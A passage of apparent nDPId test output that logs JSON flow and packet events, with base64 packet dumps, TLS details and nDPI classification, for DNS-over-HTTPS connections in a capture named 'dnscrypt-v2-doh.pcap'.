NDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 